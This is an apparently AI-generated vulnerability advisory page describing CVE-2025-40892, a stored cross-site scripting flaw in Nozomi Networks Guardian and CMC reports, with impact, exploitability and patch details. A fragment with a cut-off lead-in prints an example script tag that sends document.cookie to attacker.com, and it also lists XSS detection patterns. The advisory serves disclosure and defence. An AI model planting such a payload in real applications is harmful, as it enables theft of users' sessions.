
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-40892 is a Stored Cross-Site Scripting (XSS) vulnerability in the Reports functionality of Nozomi Networks Guardian and CMC (Central Management Console) products, caused by improper validation of an input parameter. An authenticated user with report privileges can embed a malicious JavaScript payload in a report, or socially engineer a victim into importing a malicious report template. All versions of Guardian and CMC prior to 25.5.0 are affected. The vulnerability was published on December 18, 2025, with a CVSS v3.1 base score of 8.9 (High) (Nozomi Advisory).
The root cause is improper neutralization of user-supplied input in the Reports functionality (CWE-79), where an input parameter is not adequately sanitized before being rendered in the web interface. An authenticated attacker with low privileges can craft a report containing a JavaScript payload; when a victim views or imports the report, the script executes in the victim's browser context. The attack vector is network-based, requires low privileges, and necessitates user interaction (passive), with a changed scope indicating cross-context impact. No public proof-of-concept code has been identified (Nozomi Advisory, The Hacker Wire).
Successful exploitation allows the attacker to perform unauthorized actions in the victim's browser context, including modifying application data (high integrity impact), disrupting application availability (high availability impact), and accessing limited sensitive information (low confidentiality impact). Because Nozomi Networks Guardian and CMC are OT/ICS network monitoring platforms, compromise of these systems could undermine visibility into industrial network security posture and potentially facilitate further lateral movement within monitored environments (Nozomi Advisory).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.034%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker with report privileges and victim interaction, limiting opportunistic exploitation (Nozomi Advisory, The Hacker Wire).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) within an improperly validated input parameter in the Reports functionality.<script>, onerror=, javascript:) appearing in report names, descriptions, or parameters within application audit logs.Nozomi Networks has released version 25.5.0 of both Guardian and CMC, which addresses this vulnerability. Organizations should update to version 25.5.0 or later as the primary remediation. As interim mitigations, restrict report creation and import privileges to trusted users only, disable the Reports functionality if not operationally required, and implement additional monitoring for suspicious report activity (Nozomi Advisory).
The vulnerability received coverage from The Hacker Wire, which highlighted the high-severity stored XSS risk to application reports and user sessions. CISA referenced the vulnerability in its weekly vulnerability bulletin (SB25-356). No significant researcher commentary or broader community debate has been identified beyond standard vulnerability tracking and aggregation (The Hacker Wire, CISA Bulletin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."